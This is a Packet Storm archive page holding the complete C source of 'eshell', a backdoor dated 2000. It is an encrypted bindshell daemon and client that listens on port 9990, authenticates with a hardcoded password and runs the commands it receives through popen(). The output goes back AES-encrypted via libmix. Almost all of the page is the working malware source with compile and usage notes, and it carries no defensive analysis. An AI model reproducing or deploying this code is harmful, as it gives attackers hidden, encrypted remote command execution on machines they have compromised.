Eshell.c is a encrypted bindshell type backdoor which has a server daemon and client with AES encryption via libmix.
c32ad105680ad262b5dca88fcaaaf43d24a5994d3d79f9243bfc0001ca76c38b/*
Program name : eshell v.01, 2000-12-19
Tested on : linux
Author : jenggo <luki@karet.org>, #karet
Require : libmix -- http://mixter.warrior2k.com
Description : eshell, Encrypted bindshell daemon/client with
AES crypto algorithm supported.
It is popen(), NOT full I/O bash shell ...
TODO : make full functional encrypted bindshell
( any ideas ? )
BUGS : if received data > max_size the output will truncated
stderr is also truncated
very very not optimized :P
Compile : gcc eshell.c -o eshell -lmix -Wall
Usage : ./eshell -h
Thankie : echo, ularkasur #karet
*/
#include <mix/mix.h>
#define PORT 9990 /* port to listen or send */
#define PASS "taun baruan dimana ya ?" /* password, change this */
#define AES_ALG SAFERP /* AES Algorithm to use */
#define RECSIZE 65536 /* max size of received data, make sure its big enough */
#define SNDSIZE 4096 /* max command size */
void servermode (unsigned long to, int port);
void clientmode (char *host, int port);
void usage(char *cmd);
void usage (char *cmd)
{
printf ("Usage: %s <host>\n",cmd);
printf ("Encrypted bindshell daemon/client with AES crypto algorithm supported\n");
printf ("if called without any argument will run into server mode\n\n");
printf (" %s\t<host>\t -- client mode\n",cmd);
printf (" \t\t\t host is hostname / IP to connect\n");
printf (" %s\t\t -- server mode\n",cmd);
exit(0);
}
void servermode (unsigned long to, int port)
{
int i = 0, h, sock = socket (PF_INET, SOCK_STREAM, 0), insock, heh;
char *p, *q, d[SNDSIZE*2];
struct sa sin;
struct sa sout;
FILE *com;
fd_set dupfd;
sin.fam = PF_INET;
sin.add = to;
sin.dp = htons(port);
if((bind(sock,(struct sockaddr *)&sin,sizeof(sin))<0))
exit(printf("Bind error\n"));
if((listen(sock,5))<0)
exit(printf("Listen error\n"));
heh=sizeof(struct sockaddr_in);
/* init AES */
alg = AES_ALG;
aes_key ((const char *)PASS);
while (1) {
if((insock=accept(sock, (struct sockaddr *)&sout, &heh)) == -1)
{
perror("accept");
exit(1);
}
signal(SIGHUP,SIG_IGN);
signal(SIGCHLD,SIG_IGN); // zombies dead
if(!fork()) {
/* authenticate first */
memset(d,'\0', sizeof(d));
h=read(insock, d, sizeof(d)-1);
i = strlen(d);
p = (char *) aes_decrypt((const u1byte *) d, i);
if ((strcmp(p, PASS)) < 0)
{
exit(0);
}
free(p);
/* make it like a real shell :) */
while (1)
{
FD_ZERO(&dupfd);
FD_SET(insock,&dupfd);
FD_SET(STDIN_FILENO,&dupfd);
select(insock+1,&dupfd,NULL,NULL,NULL);
if (FD_ISSET(insock,&dupfd))
{
memset(d,'\0', sizeof(d));
h=read(insock, d, sizeof(d)-1);
if (h <= 0)
exit(0);
/* decrypt */
i = strlen(d);
p = (char *) aes_decrypt((const u1byte *) d, i);
/* build the command */
dup2(insock,2);
com = popen (p,"r");
free (p);
while (!feof(com))
{
memset(d,'\0', sizeof(d));
fread (d, 1, sizeof(d)-1, com);
/* encrypt it */
i = strlen(d);
q = (char *) aes_encrypt((const u1byte *) d, &i);
/* send the result */
write (insock, q, strlen(q));
free (q);
// sleep(1);
}
pclose(com);
}
}
}
}
}
void clientmode (char *host, int port)
{
int i = 0, h, sock = socket (PF_INET, SOCK_STREAM, 0);
char *p,*g;
struct sa sin;
fd_set dupfd;
sin.fam = PF_INET;
sin.add = resolve (host);
sin.dp = htons(PORT);
/* init AES */
alg = AES_ALG;
aes_key ((const char *)PASS);
(void) connect(sock, (struct sockaddr *) &sin, sizeof(sin));
/* send encrypted pass */
i = strlen(PASS);
p = (char *) aes_encrypt((const u1byte *) PASS, &i);
(void) write (sock, p, strlen(p));
free(p);
while (1)
{
FD_ZERO(&dupfd);
FD_SET(sock,&dupfd);
FD_SET(STDIN_FILENO,&dupfd);
select(sock+1,&dupfd,NULL,NULL,NULL);
/* read from socket */
if (FD_ISSET(sock,&dupfd))
{
if ((g=malloc(RECSIZE)) < 0)
{
printf("malloc()\n");
exit(0);
}
memset(g, '\0', RECSIZE);
h=read(sock,g,RECSIZE-1);
if (h <= 0)
exit(0);
/* decrypt it */
i = strlen(g);
p = (char *) aes_decrypt((const u1byte *) g, i);
printf("%s",p);
free (p);
free (g);
}
/* read from stdin */
if (FD_ISSET(STDIN_FILENO,&dupfd))
{
if ((g=malloc(SNDSIZE)) < 0)
{
printf("malloc()\n");
exit(0);
}
memset(g, 0, SNDSIZE);
h=read(STDIN_FILENO,g, SNDSIZE);
if (h > 0)
{
/* encrypt it */
i = strlen(g);
p = (char *) aes_encrypt((const u1byte *) g, &i);
(void) write (sock, p, strlen(p));
free(p);
free(g);
}
}
}
}
int main (int argc, char **argv)
{
unsigned long lh;
if (argc > 1)
{
if ( (strcmp(argv[1],"-h") == 0) || (strcmp(argv[1],"--help") == 0) )
{
usage(argv[0]);
exit(0);
}
else
{
if ( (strlen(argv[1]) < 65) && (argc == 2))
{
printf ("Remember it is sh -c \"your commands\" , not full I/O shell !\n");
printf ("Client mode: <ctrl+c to quit>\n");
clientmode (argv[1], PORT);
}
else
{
printf ("error: bad hostname\n");
usage (argv[0]);
exit(0);
}
}
}
else
{
lh = resolve ("localhost");
servermode (lh, PORT);
}
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed